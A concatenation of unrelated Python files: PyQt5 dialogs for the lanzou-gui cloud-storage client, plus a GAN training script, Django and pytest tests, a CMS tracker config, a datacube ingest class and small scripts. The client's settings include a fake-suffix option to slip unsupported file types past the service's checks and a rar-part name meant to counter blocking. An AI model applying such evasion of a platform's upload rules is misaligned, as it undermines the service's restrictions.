            self.tx_name.setText("")
            self.buttonBox.button(QDialogButtonBox.Ok).setEnabled(False)
            self.buttonBox.button(QDialogButtonBox.Ok).setToolTip("请先输入文件名!")
            self.tx_name.textChanged.connect(self.slot_new_ok_btn)
            self.tx_name.setPlaceholderText("不支持空格,如有会被自动替换成 _")
            self.tx_name.setFocusPolicy(Qt.StrongFocus)
            self.tx_name.setReadOnly(False)
            self.tx_desc.setPlaceholderText("可选项,建议160字数以内。")
        if self.min_width < 400:
            self.min_width = 400
        self.resize(self.min_width, 200)
    def slot_new_ok_btn(self):
        """Re-enable OK once the new-folder name field is no longer empty."""
        self.buttonBox.button(QDialogButtonBox.Ok).setEnabled(True)
        self.buttonBox.button(QDialogButtonBox.Ok).setToolTip("")
    def btn_ok(self):
        # Emit only when something actually changed.
        new_name = self.tx_name.text()
        new_desc = self.tx_desc.toPlainText()
        if not self.infos:  # creating a new folder under the current work_id
            if new_name:
                self.out.emit(("new", "", new_name, new_desc))
            else:
                return
        elif new_name != self.infos[1] or(new_desc and new_desc != self.infos[6]):
            if self.infos[2]:  # file: only the description changes
                self.out.emit(("file", self.infos[0], new_name, new_desc))
            else:
                self.out.emit(("folder", self.infos[0], new_name, new_desc))
class SetPwdDialog(QDialog):
    """Dialog for changing a file/folder extraction password.

    Emits ``new_infos`` with (fid, new_pwd, size_field) -- the size field
    is passed through so the receiver can tell files from folders.
    """
    new_infos = pyqtSignal(object)
    def __init__(self, parent=None):
        super(SetPwdDialog, self).__init__(parent)
        self.infos = None
        self.initUI()
        self.update_text()
        self.setStyleSheet(dialog_qss_style)
    def set_values(self, infos):
        self.infos = infos
        self.update_text()  # refresh the UI for the new record
    def set_tip(self):  # busy indicator while the change is applied
        self.setWindowTitle("请稍等……")
    def initUI(self):
        """Build the widgets and layout."""
        self.setWindowTitle("请稍等……")
        self.setWindowIcon(QIcon("./icon/password.ico"))
        self.lb_oldpwd = QLabel()
        self.lb_oldpwd.setText("当前提取码:")
        self.lb_oldpwd.setAlignment(Qt.AlignRight | Qt.AlignTrailing | Qt.AlignVCenter)
        self.tx_oldpwd = QLineEdit()
        # Current password field is read-only display.
        self.tx_oldpwd.setFocusPolicy(Qt.NoFocus)
        self.tx_oldpwd.setReadOnly(True)
        self.lb_newpwd = QLabel()
        self.lb_newpwd.setText("新的提取码:")
        self.lb_newpwd.setAlignment(Qt.AlignRight | Qt.AlignTrailing | Qt.AlignVCenter)
        self.tx_newpwd = QLineEdit()
        self.buttonBox = QDialogButtonBox()
        self.buttonBox.setOrientation(Qt.Horizontal)
        self.buttonBox.setStandardButtons(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)
        self.buttonBox.button(QDialogButtonBox.Ok).setText("确定")
        self.buttonBox.button(QDialogButtonBox.Cancel).setText("取消")
        self.grid = QGridLayout()
        self.grid.setSpacing(10)
        self.grid.addWidget(self.lb_oldpwd, 1, 0)
        self.grid.addWidget(self.tx_oldpwd, 1, 1)
        self.grid.addWidget(self.lb_newpwd, 2, 0)
        self.grid.addWidget(self.tx_newpwd, 2, 1)
        self.grid.addWidget(self.buttonBox, 3, 0, 1, 2)
        self.setLayout(self.grid)
        self.buttonBox.accepted.connect(self.btn_ok)
        self.buttonBox.accepted.connect(self.accept)
        self.buttonBox.accepted.connect(self.set_tip)
        self.buttonBox.rejected.connect(self.reject)
        self.buttonBox.rejected.connect(self.set_tip)
        self.setMinimumWidth(280)
    def update_text(self):
        """Show the current password and adapt limits to file vs folder."""
        if self.infos:
            if self.infos[5]:
                self.tx_oldpwd.setText(str(self.infos[5]))
                self.tx_oldpwd.setPlaceholderText("")
            else:
                self.tx_oldpwd.setText("")
                self.tx_oldpwd.setPlaceholderText("无")
            if self.infos[2]:  # file: the size column marks a file
                self.setWindowTitle("修改文件提取码")
                self.tx_newpwd.setPlaceholderText("2-6位字符,关闭请留空")
                self.tx_newpwd.setMaxLength(6)  # files: at most 6 characters
            else:  # folder
                self.setWindowTitle("修改文件夹名提取码")
                self.tx_newpwd.setPlaceholderText("2-12位字符,关闭请留空")
                self.tx_newpwd.setMaxLength(12)  # folders: at most 12 characters
    def btn_ok(self):
        new_pwd = self.tx_newpwd.text()
        if new_pwd != self.infos[5]:
            self.new_infos.emit((self.infos[0], new_pwd, self.infos[2]))  # last field marks file vs folder
class MoveFileDialog(QDialog):
    """Dialog for moving files into another folder.

    ``infos`` is the list of selected entries (only entries with a truthy
    size field, i.e. files, can be moved); ``all_dirs_dict`` maps folder
    names to folder ids. Emits ``new_infos`` with a list of
    (fid, target_folder_id, name) tuples when confirmed.
    """
    new_infos = pyqtSignal(object)
    def __init__(self, infos, all_dirs_dict, parent=None):
        super(MoveFileDialog, self).__init__(parent)
        self.infos = infos
        self.dirs = all_dirs_dict
        self.initUI()
        self.setStyleSheet(dialog_qss_style)
    def initUI(self):
        """Build the widgets and layout."""
        # BUGFIX: the original removed entries from self.infos while
        # iterating over it, which skips the element following every removal
        # (so adjacent folders could survive the filter). Filter in one pass
        # and assign back in place so a caller-held reference stays updated.
        self.infos[:] = [i for i in self.infos if i[2]]  # i[2] (size) is truthy for files only
        self.setWindowTitle("移动文件")
        self.setWindowIcon(QIcon("./icon/move.ico"))
        self.lb_name = QLabel()
        self.lb_name.setText("文件路径:")
        self.lb_name.setAlignment(Qt.AlignRight | Qt.AlignTrailing | Qt.AlignVCenter)
        self.tx_name = QLineEdit()
        names = " | ".join([i[1] for i in self.infos])
        names_tip = "\n".join([i[1] for i in self.infos])
        self.tx_name.setText(names)
        self.tx_name.setToolTip(names_tip)
        # Read-only: this field only displays the selection.
        self.tx_name.setFocusPolicy(Qt.NoFocus)
        self.tx_name.setReadOnly(True)
        self.lb_new_path = QLabel()
        self.lb_new_path.setText("目标文件夹:")
        self.lb_new_path.setAlignment(
            Qt.AlignRight | Qt.AlignTrailing | Qt.AlignVCenter
        )
        self.tx_new_path = QComboBox()
        f_icon = QIcon("./icon/folder.gif")
        for f_name, fid in self.dirs.items():
            if len(f_name) > 50:  # truncate overly long folder names for display
                f_name = f_name[:47] + "..."
            self.tx_new_path.addItem(f_icon, "id:{:>8},name:{}".format(fid, f_name))
        self.buttonBox = QDialogButtonBox()
        self.buttonBox.setOrientation(Qt.Horizontal)
        self.buttonBox.setStandardButtons(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)
        self.buttonBox.button(QDialogButtonBox.Ok).setText("确定")
        self.buttonBox.button(QDialogButtonBox.Cancel).setText("取消")
        self.grid = QGridLayout()
        self.grid.setSpacing(10)
        self.grid.addWidget(self.lb_name, 1, 0)
        self.grid.addWidget(self.tx_name, 1, 1)
        self.grid.addWidget(self.lb_new_path, 2, 0)
        self.grid.addWidget(self.tx_new_path, 2, 1)
        self.grid.addWidget(self.buttonBox, 3, 0, 1, 2)
        self.setLayout(self.grid)
        self.buttonBox.accepted.connect(self.btn_ok)
        self.buttonBox.accepted.connect(self.accept)
        self.buttonBox.rejected.connect(self.reject)
        self.setMinimumWidth(280)
    def btn_ok(self):
        # Combo text looks like "id:     123,name:xxx"; take the id part.
        # NOTE(review): the extracted id keeps the {:>8} left-padding spaces
        # (original behavior, preserved) -- confirm the receiver strips it.
        selected = self.tx_new_path.currentText().split(",")[0].split(":")[1]
        self.new_infos.emit([(info[0], selected, info[1]) for info in self.infos])
class DeleteDialog(QDialog):
    """Confirmation dialog listing the entries about to be deleted.

    Emits ``new_infos`` with a list of {'fid', 'is_file', 'name'} dicts
    when the user confirms.
    """
    new_infos = pyqtSignal(object)
    def __init__(self, infos, parent=None):
        super(DeleteDialog, self).__init__(parent)
        self.infos = infos
        self.out = []  # payload for new_infos, built in initUI
        self.initUI()
        self.setStyleSheet(dialog_qss_style)
    def set_file_icon(self, name):
        """Pick an icon by file extension, falling back to the generic one."""
        suffix = name.split(".")[-1]
        ico_path = "./icon/{}.gif".format(suffix)
        if os.path.isfile(ico_path):
            return QIcon(ico_path)
        else:
            return QIcon("./icon/file.ico")
    def initUI(self):
        """Build the list of doomed entries and the confirm/cancel buttons."""
        self.setWindowTitle("确认删除")
        self.setWindowIcon(QIcon("./icon/delete.ico"))
        # NOTE(review): self.layout shadows QWidget.layout() -- works, but a
        # different attribute name would be safer.
        self.layout = QVBoxLayout()
        self.list_view = QListView()
        self.list_view.setViewMode(QListView.ListMode)
        # Entry list model.
        self.slm = QStandardItem()
        self.model = QStandardItemModel()
        max_len = 10
        count = 0
        for i in self.infos:
            if i[2]:  # a truthy size field means this is a file
                self.model.appendRow(QStandardItem(self.set_file_icon(i[1]), i[1]))
            else:
                self.model.appendRow(QStandardItem(QIcon("./icon/folder.gif"), i[1]))
            self.out.append({'fid': i[0], 'is_file': True if i[2] else False, 'name': i[1]})  # id, file flag, name
            count += 1
            if max_len < len(i[1]):  # track the longest name for sizing
                max_len = len(i[1])
        self.list_view.setModel(self.model)
        self.lb_name = QLabel("尝试删除以下{}个文件(夹):".format(count))
        self.buttonBox = QDialogButtonBox()
        self.buttonBox.setOrientation(Qt.Horizontal)
        self.buttonBox.setStandardButtons(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)
        self.buttonBox.button(QDialogButtonBox.Ok).setText("确定")
        self.buttonBox.button(QDialogButtonBox.Cancel).setText("取消")
        self.layout.addWidget(self.lb_name)
        self.layout.addWidget(self.list_view)
        self.layout.addWidget(self.buttonBox)
        self.setLayout(self.layout)
        self.buttonBox.accepted.connect(self.btn_ok)
        self.buttonBox.accepted.connect(self.accept)
        self.buttonBox.rejected.connect(self.reject)
        self.setMinimumWidth(400)
        # Scale the dialog with the longest name and the number of rows.
        self.resize(int(max_len*8), int(count*34+60))
    def btn_ok(self):
        self.new_infos.emit(self.out)
class AboutDialog(QDialog):
    """About dialog: version, description, author and project links."""
    out = pyqtSignal(object)
    def __init__(self, parent=None):
        super(AboutDialog, self).__init__(parent)
        self.initUI()
        self.setStyleSheet(dialog_qss_style)
    def set_values(self, version):
        # Refresh the displayed version string.
        self.lb_name_text.setText("<font color=blue>"+version+"</font>")
    def initUI(self):
        """Build the static about/links content and layout."""
        about = '''
    本项目使用PyQt5实现图形界面,可以完成蓝奏云的大部分功能<br/>
    得益于 API 的功能,可以间接突破单文件最大 100MB 的限制,同时增加了批量上传/下载的功能<br/>
    Python 依赖见<a href="https://github.com/rachpt/lanzou-gui/blob/master/requirements.txt">requirements.txt</a>,<a href="https://github.com/rachpt/lanzou-gui/releases">releases</a> 有打包好了的 Windows 可执行程序,但可能不是最新的
        '''
        project_url = '''
    主 repo : <a href="https://github.com/rachpt/lanzou-gui">https://github.com/rachpt/lanzou-gui</a><br/>
    镜像 repo : <a href="https://gitee.com/rachpt/lanzou-gui">https://gitee.com/rachpt/lanzou-gui</a>
        '''
        self.setWindowTitle("关于 lanzou-gui")
        self.logo = QLabel()  # logo
        self.logo.setPixmap(QPixmap("./icon/logo2.gif"))
        self.logo.setStyleSheet("background-color:rgb(255,255,255);")
        self.logo.setAlignment(Qt.AlignCenter)
        self.lb_name = QLabel("版本")  # version label
        self.lb_name_text = QLabel("")  # version value, filled by set_values
        self.lb_about = QLabel("About")  # about label
        self.lb_about_text = QTextEdit(about)  # about body
        self.lb_about_text.setFocusPolicy(Qt.NoFocus)
        self.lb_about_text.setReadOnly(True)
        # self.lb_about_text.setOpenExternalLinks(True)
        self.lb_author = QLabel("Author")  # author label
        self.lb_author_mail = QLabel("rachpt@126.com")  # author contact
        self.lb_update = QLabel("更新地址")  # update-links label
        self.lb_update_url = QLabel(project_url)
        self.lb_update_url.setOpenExternalLinks(True)
        self.buttonBox = QDialogButtonBox()
        self.buttonBox.setOrientation(Qt.Horizontal)
        self.buttonBox.setStandardButtons(QDialogButtonBox.Close)
        self.buttonBox.button(QDialogButtonBox.Close).setText("关闭")
        self.buttonBox.accepted.connect(self.accept)
        self.buttonBox.rejected.connect(self.reject)
        self.grid = QGridLayout()
        self.grid.setSpacing(10)
        self.grid.addWidget(self.logo, 1, 0, 2, 3)
        self.grid.addWidget(self.lb_name, 3, 0)
        self.grid.addWidget(self.lb_name_text, 3, 1)
        self.grid.addWidget(self.lb_about, 4, 0)
        self.grid.addWidget(self.lb_about_text, 4, 1, 3, 2)
        self.grid.addWidget(self.lb_author, 7, 0)
        self.grid.addWidget(self.lb_author_mail, 7, 1)
        self.grid.addWidget(self.lb_update, 8, 0)
        self.grid.addWidget(self.lb_update_url, 8, 1, 2, 2)
        self.grid.addWidget(self.buttonBox, 10, 2)
        self.setLayout(self.grid)
        self.setFixedSize(660, 300)
class SettingDialog(QDialog):
    """Settings dialog: edits the application configuration and persists it."""
    # Emitted after the settings have been written to the config file.
    saved = pyqtSignal()
    def __init__(self, config_file: str, default_settings: dict, parent=None):
        super(SettingDialog, self).__init__(parent)
        self.cwd = os.getcwd()
        self._config_file = config_file
        self._default_settings = default_settings
        # Current setting values; populated by set_values() below.
        self.rar_tool = None
        self.download_threads = None
        self.max_size = None
        self.timeout = None
        self.guise_suffix = None
        self.rar_part_name = None
        self.dl_path = None
        self.time_fmt = False
        self.initUI()
        self.set_values()
        self.setStyleSheet(dialog_qss_style)
    def open_dialog(self):
        """Refresh the displayed values, then show the dialog modally."""
        self.set_values()
        self.exec()
    def read_values(self):
        """Read settings from the config file; fall back to the defaults on any error."""
        try:
            # NOTE(review): `load` comes from a file-top import not visible
            # here -- presumably pickle.load given the binary mode; confirm.
            with open(self._config_file, "rb") as _file:
                configs = load(_file)
            settings = configs["settings"]
        except Exception:
            settings = self._default_settings
        return settings
    def show_values(self):
        """Push the current attribute values into the widgets."""
        self.rar_tool_var.setText(self.rar_tool)
        self.download_threads_var.setText(str(self.download_threads))
        self.max_size_var.setText(str(self.max_size))
        self.timeout_var.setText(str(self.timeout))
        self.guise_suffix_var.setText(str(self.guise_suffix))
        self.rar_part_name_var.setText(str(self.rar_part_name))
        self.dl_path_var.setText(str(self.dl_path))
        self.time_fmt_box.setChecked(self.time_fmt)
    def set_values(self, reset=False):
        """Load settings (defaults when reset=True) and refresh the widgets."""
        settings = self._default_settings if reset else self.read_values()
        self.rar_tool = settings["rar_tool"]
        self.download_threads = settings["download_threads"]
        self.max_size = settings["max_size"]
        self.timeout = settings["timeout"]
        self.guise_suffix = settings["guise_suffix"]
        self.rar_part_name = settings["rar_part_name"]
        self.dl_path = settings["dl_path"]
        self.time_fmt = settings["time_fmt"]
        self.show_values()
    def get_values(self) -> dict:
        """Collect the widget values and return them as a settings dict.

        time_fmt is not read from a widget here; it is kept current by
        change_time_fmt() via the checkbox signal.
        """
        self.rar_tool = self.rar_tool_var.text()
        self.download_threads = int(self.download_threads_var.text())
        self.max_size = float(self.max_size_var.text())
        self.timeout = float(self.timeout_var.text())
        self.guise_suffix = str(self.guise_suffix_var.text())
        self.rar_part_name = str(self.rar_part_name_var.text())
        self.dl_path = str(self.dl_path_var.text())
        return {"rar_tool": self.rar_tool, "download_threads": self.download_threads,
                "max_size": self.max_size, "guise_suffix": self.guise_suffix, "dl_path": self.dl_path,
                "timeout": self.timeout, "rar_part_name": self.rar_part_name, "time_fmt": self.time_fmt}
    def initUI(self):
        """Build all widgets and lay them out (logo, form, checkbox, buttons)."""
        self.setWindowTitle("设置")
        logo = QLabel()  # logo image
        logo.setPixmap(QPixmap("./icon/logo2.gif"))
        logo.setStyleSheet("background-color:rgb(255,255,255);")
        logo.setAlignment(Qt.AlignCenter)
        self.rar_tool_lb = QLabel("rar路径")  # path to the rar executable
        self.rar_tool_var = MyLineEdit(self)
        self.rar_tool_var.clicked.connect(self.set_rar_path)
        self.rar_tool_var.setPlaceholderText("用于大文件分卷压缩与分卷合并")
        self.rar_tool_var.setToolTip("用于大文件分卷压缩与分卷合并")
        self.download_threads_lb = QLabel("同时下载文件数")  # concurrent download count
        self.download_threads_var = QLineEdit()
        self.download_threads_var.setPlaceholderText("范围:1-7")
        self.download_threads_var.setToolTip("范围:1-7")
        self.max_size_lb = QLabel("分卷大小(MB)")
        self.max_size_var = QLineEdit()
        self.max_size_var.setPlaceholderText("普通用户最大100,vip用户根据具体情况设置")
        self.max_size_var.setToolTip("普通用户最大100,vip用户根据具体情况设置")
        self.timeout_lb = QLabel("请求超时(秒)")
        self.timeout_var = QLineEdit()
        self.timeout_var.setPlaceholderText("范围:2-30")
        self.timeout_var.setToolTip("范围:2-30")
        self.guise_suffix_lb = QLabel("假后缀")
        self.guise_suffix_var = QLineEdit()
        self.guise_suffix_var.setPlaceholderText("让不支持的文件类型改成该后缀名,蒙混过关")
        self.guise_suffix_var.setToolTip("让不支持的文件类型改成该后缀名,蒙混过关")
        self.rar_part_name_lb = QLabel("rar分卷名")
        self.rar_part_name_var = QLineEdit()
        self.rar_part_name_var.setPlaceholderText("大文件分卷标识字符串,对抗封禁")
        self.rar_part_name_var.setToolTip("大文件分卷标识字符串,对抗封禁")
        self.dl_path_lb = QLabel("下载保存路径")
        self.dl_path_var = MyLineEdit(self)
        self.dl_path_var.clicked.connect(self.set_download_path)
        self.time_fmt_box = QCheckBox("使用[年-月-日]时间格式")
        self.time_fmt_box.toggle()
        self.time_fmt_box.stateChanged.connect(self.change_time_fmt)
        buttonBox = QDialogButtonBox()
        buttonBox.setOrientation(Qt.Horizontal)
        buttonBox.setStandardButtons(QDialogButtonBox.Reset | QDialogButtonBox.Save | QDialogButtonBox.Cancel)
        buttonBox.button(QDialogButtonBox.Reset).setText("重置")
        buttonBox.button(QDialogButtonBox.Save).setText("保存")
        buttonBox.button(QDialogButtonBox.Cancel).setText("取消")
        buttonBox.button(QDialogButtonBox.Reset).clicked.connect(lambda: self.set_values(reset=True))
        buttonBox.button(QDialogButtonBox.Save).clicked.connect(self.slot_save)
        buttonBox.rejected.connect(self.reject)
        form = QFormLayout()
        form.setSpacing(10)
        form.addRow(self.download_threads_lb, self.download_threads_var)
        form.addRow(self.timeout_lb, self.timeout_var)
        form.addRow(self.guise_suffix_lb, self.guise_suffix_var)
        form.addRow(self.max_size_lb, self.max_size_var)
        form.addRow(self.rar_part_name_lb, self.rar_part_name_var)
        form.addRow(self.rar_tool_lb, self.rar_tool_var)
        form.addRow(self.dl_path_lb, self.dl_path_var)
        vbox = QVBoxLayout()
        vbox.addWidget(logo)
        vbox.addStretch(1)
        vbox.addLayout(form)
        vbox.addStretch(1)
        vbox.addWidget(self.time_fmt_box)
        vbox.addStretch(1)
        vbox.addWidget(buttonBox)
        self.setLayout(vbox)
        self.setMinimumWidth(500)
    def change_time_fmt(self, state):
        """Track the [year-month-day] time-format checkbox state."""
        if state == Qt.Checked:
            self.time_fmt = True
        else:
            self.time_fmt = False
    def set_rar_path(self):
        """Choose the rar executable via a file dialog."""
        rar_path, _ = QFileDialog.getOpenFileName(self, "选择 rar 路径", self.cwd, "All Files (*)")
        if len(rar_path) == 0:
            return
        rar_path = os.path.normpath(rar_path)  # windows backslash
        self.rar_tool_var.setText(rar_path)
        self.rar_tool = rar_path
    def set_download_path(self):
        """Choose the download folder via a directory dialog."""
        dl_path = QFileDialog.getExistingDirectory(self, "选择文件下载保存文件夹", self.cwd)
        dl_path = os.path.normpath(dl_path)  # windows backslash
        if dl_path == self.dl_path or dl_path == ".":
            return
        self.dl_path_var.setText(dl_path)
        self.dl_path = dl_path
    def slot_save(self):
        """Save slot: persist the settings, emit `saved`, and close the dialog."""
        update_settings(self._config_file, self.get_values(), is_settings=True)
        self.saved.emit()
        self.close()
|
import os
import time
import tensorflow as tf
from tensorflow.keras.initializers import RandomNormal
from tensorflow.keras import Sequential
from tensorflow.keras.layers import Dense, BatchNormalization, \
    LeakyReLU, Conv2DTranspose, Conv2D, Dropout, Flatten, Reshape
import scipy as sp
import numpy as np
from LkGAN import LkGAN

# Experiment configuration: k for the Lk loss, loss-weight version,
# trial index, and RNG seed.
k, version, trial_number, seed_num = 1, 1, 1, 1
# Loss weights (alpha, beta) chosen by version; gamma balances them.
if int(version) == 1:
    alpha = 0.6
    beta = 0.4
elif int(version) == 2:
    alpha = 1
    beta = 0
else:
    alpha = 0
    beta = 1
if int(version) == 3:
    gamma = 1
else:
    gamma = (alpha + beta)/2.0
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
np.random.seed(int(seed_num))
tf.random.set_random_seed(int(seed_num))
# BUG FIX: alpha/beta/gamma are fractional weights (0.6/0.4/0.5 for
# version 1); the previous int() casts truncated them all to 0, so the
# configured weights never reached the model. Pass them as floats.
model = LkGAN(round(float(k), 1), int(version), float(alpha), float(beta), float(gamma), int(trial_number))
model.build()
model.train(n_epochs=100)
|
from django.test import TestCase
from django.contrib.auth.models import User
from .models import healthservices,neighbourhood
import datetime as dt
# Create your tests here.
class neighbourhoodTestClass(TestCase):
    """Unit tests for the neighbourhood model."""
    def setUp(self):
        # A fresh, unsaved model instance for every test.
        self.kataret = neighbourhood(neighbourhood='kataret')
    def test_instance(self):
        # The fixture must be a neighbourhood model object.
        self.assertTrue(isinstance(self.kataret, neighbourhood))
    def tearDown(self):
        # Leave the table empty between tests.
        neighbourhood.objects.all().delete()
    def test_save_method(self):
        # save_neighbourhood() must persist the record to the database.
        self.kataret.save_neighbourhood()
        saved_hoods = neighbourhood.objects.all()
        self.assertTrue(len(saved_hoods) > 0)
|
import pytest
import numpy as np
from ..posrich import posrich
import pkg_resources
PATH = pkg_resources.resource_filename(__name__, 'test_data/')


def test_posrich():
    "Test positional enrichment"
    # Load test sequences; use a context manager so the file handle is
    # closed deterministically (it was previously leaked).
    with open(PATH + 'multiple.txt') as handle:
        X_list = handle.read().splitlines()
    X_err = 'AGT2HT9'

    # Single position: presence of 'A' at position 2 per sequence.
    posrich_single = posrich(X_list, position=2, aminoacid='A')
    assert np.array_equal(posrich_single, np.array([1., 0., 1.]))

    # Multiple positions queried at once; one output column per position.
    posrich_multiple = posrich(X_list, position=[2, 4], aminoacid=['A', 'K'])
    assert np.array_equal(posrich_multiple[:, 0], np.array([1., 0., 1.]))
    assert np.array_equal(posrich_multiple[:, 1], np.array([1., 0., 0.]))

    # Erroneous inputs must raise ValueError: bad sequence, mismatched
    # position/aminoacid lengths (both ways), and swapped argument types.
    with pytest.raises(ValueError):
        posrich(X_err, position=1, aminoacid='R')
    with pytest.raises(ValueError):
        posrich(X_err, position=[1, 2], aminoacid=['R', 'A', 'K'])
    with pytest.raises(ValueError):
        posrich(X_err, position=[1, 2], aminoacid=['R', 'A'])
    with pytest.raises(ValueError):
        posrich(X_err, position='R', aminoacid=1)
|
import FWCore.ParameterSet.Config as cms
from RecoLocalTracker.SiStripZeroSuppression.DefaultAlgorithms_cff import *
# Zero-suppression of the raw SiStrip digi collections unpacked by
# siStripDigis (virgin raw, processed raw and scope mode).
siStripZeroSuppression = cms.EDProducer("SiStripZeroSuppression",
    Algorithms = DefaultAlgorithms,
    RawDigiProducersList = cms.VInputTag( cms.InputTag('siStripDigis','VirginRaw'),
                                          cms.InputTag('siStripDigis','ProcessedRaw'),
                                          cms.InputTag('siStripDigis','ScopeMode')),
    DigisToMergeZS = cms.InputTag('siStripDigis','ZeroSuppressed'),
    DigisToMergeVR = cms.InputTag('siStripVRDigis','VirginRaw'),
    storeCM = cms.bool(True),
    fixCM= cms.bool(False), # put -999 into CM collection for "inspected" APV
    produceRawDigis = cms.bool(True), # if mergeCollection is True, produceRawDigi is not considered
    produceCalculatedBaseline = cms.bool(False),
    produceBaselinePoints = cms.bool(False),
    storeInZScollBadAPV = cms.bool(True),
    mergeCollections = cms.bool(False)
    )
# The SiStripClusters are not used anymore in phase2 tracking.
# This part has to be cleaned up when they are officially removed from the entire flow.
from Configuration.Eras.Modifier_phase2_tracker_cff import phase2_tracker
# For phase2, source the raw digis from the simulation producer instead.
phase2_tracker.toModify(siStripZeroSuppression, # FIXME
    RawDigiProducersList = cms.VInputTag( cms.InputTag('simSiStripDigis','VirginRaw'),
                                          cms.InputTag('simSiStripDigis','ProcessedRaw'),
                                          cms.InputTag('simSiStripDigis','ScopeMode'))
    )
|
#!/usr/bin/env python
#===============================================================================
# Copyright (c) 2014 Geoscience Australia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither Geoscience Australia nor the names of its contributors may be
# used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#===============================================================================
"""
AcquisitionRecord: database interface class.
These classes provide an interface between the database and the top-level
ingest algorithm (AbstractIngester and its subclasses). They also provide
the implementation of the database and tile store side of the ingest
process. They are expected to be independent of the structure of any
particular dataset, but will change if the database schema or tile store
format changes.
"""
from __future__ import absolute_import
import logging
from .ingest_db_wrapper import IngestDBWrapper
from .dataset_record import DatasetRecord
# Set up logger.
LOGGER = logging.getLogger(__name__)
LOGGER.setLevel(logging.INFO)
class AcquisitionRecord(object):
    """AcquisitionRecord database interface class.

    Builds the acquisition dictionary from dataset metadata, resolves the
    satellite and sensor ids, and looks up (or creates) the acquisition
    record in the database.
    """

    # Metadata fields copied verbatim from the dataset's metadata dict.
    ACQUISITION_METADATA_FIELDS = ['satellite_tag',
                                   'sensor_name',
                                   'x_ref',
                                   'y_ref',
                                   'start_datetime',
                                   'end_datetime',
                                   'll_lon',
                                   'll_lat',
                                   'lr_lon',
                                   'lr_lat',
                                   'ul_lon',
                                   'ul_lat',
                                   'ur_lon',
                                   'ur_lat',
                                   'gcp_count',
                                   'mtl_text',
                                   'cloud_cover'
                                   ]

    def __init__(self, collection, dataset):
        self.collection = collection
        self.datacube = collection.datacube
        self.db = IngestDBWrapper(self.datacube.db_connection)
        self.acquisition_dict = {}
        # BUG FIX: this attribute was misspelled 'acquisiton_id', which
        # created a dead attribute and never pre-initialized the real one.
        self.acquisition_id = None  # set below
        # Fill a dictionary with data for the acquisition.
        # Start with fields from the dataset metadata.
        for field in self.ACQUISITION_METADATA_FIELDS:
            self.acquisition_dict[field] = dataset.metadata_dict[field]
        # Next look up the satellite_id and sensor_id in the
        # database and fill these in.
        self.acquisition_dict['satellite_id'] = \
            self.db.get_satellite_id(self.acquisition_dict['satellite_tag'])
        self.acquisition_dict['sensor_id'] = \
            self.db.get_sensor_id(self.acquisition_dict['satellite_id'],
                                  self.acquisition_dict['sensor_name'])
        # Finally look up the acquisition_id, or create a new record if it
        # does not exist, and fill it into the dictionary.
        self.acquisition_id = \
            self.db.get_acquisition_id_fuzzy(self.acquisition_dict)
        if self.acquisition_id is None:
            self.acquisition_id = \
                self.db.insert_acquisition_record(self.acquisition_dict)
        else:
            # Do we update the acquisition record here?
            pass
        self.acquisition_dict['acquisition_id'] = self.acquisition_id

    def create_dataset_record(self, dataset):
        """Factory method to create an instance of the DatasetRecord class.

        This method creates a new record in the database if one does not
        already exist. It will overwrite an earlier dataset record (and its
        tiles) if one exists. It will raise a DatasetError if a later (or
        equal time) record for this dataset already exists in the database.
        """
        return DatasetRecord(self.collection, self, dataset)
|
#!/usr/bin/env python
import django, sys, glob, os
sys.path.append('../../server/')
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "dva.settings")
django.setup()
from dvaui.view_shared import handle_uploaded_file
from dvaapp.tasks import perform_import, perform_frame_download
from django.core.files.uploadedfile import SimpleUploadedFile
from dvaapp.models import TEvent
if __name__ == '__main__':
    # Import every CI frame-list fixture as a video, then download the
    # frames for each import's child events.
    for fname in glob.glob('../ci/framelist.*'):
        # e.g. '../ci/framelist.foo.json' -> video name 'framelist'
        name = fname.split('/')[-1].split('.')[0]
        # Use open() (the Python-2-only file() builtin does not exist in
        # Python 3) and read bytes, which SimpleUploadedFile stores as-is.
        with open(fname, 'rb') as fh:
            f = SimpleUploadedFile(fname, fh.read(), content_type="application/json")
        v = handle_uploaded_file(f, name)
        dt = TEvent.objects.get(video=v, operation='perform_import')
        perform_import(dt.pk)
        for t in TEvent.objects.filter(parent=dt):
            perform_frame_download(t.pk)
|
# Read an integer, apply the linear map y = 5x - 400, print the result,
# then report the comparison of y against 100.
x = int(input(" "))
y = 5 * x - 400
print(y)
if y < 100:
    print('1')
elif y == 100:
    print('0')
else:
    # y > 100 is the only remaining possibility for an integer y.
    print('-1')
|
from __future__ import division, print_function, unicode_literals
import argparse
import json
import random
import time
from io import open
import os
import numpy as np
import torch
from torch.optim import Adam
from convlab2.policy.mdrg.multiwoz.utils import util
from convlab2.policy.mdrg.multiwoz.model import Model
# Command-line arguments for the seq2seq MDRG trainer.
# FIX: the batch_size and seed help strings previously claimed defaults
# (128 and 1) that contradicted the actual defaults (64 and 0).
parser = argparse.ArgumentParser(description='S2S')
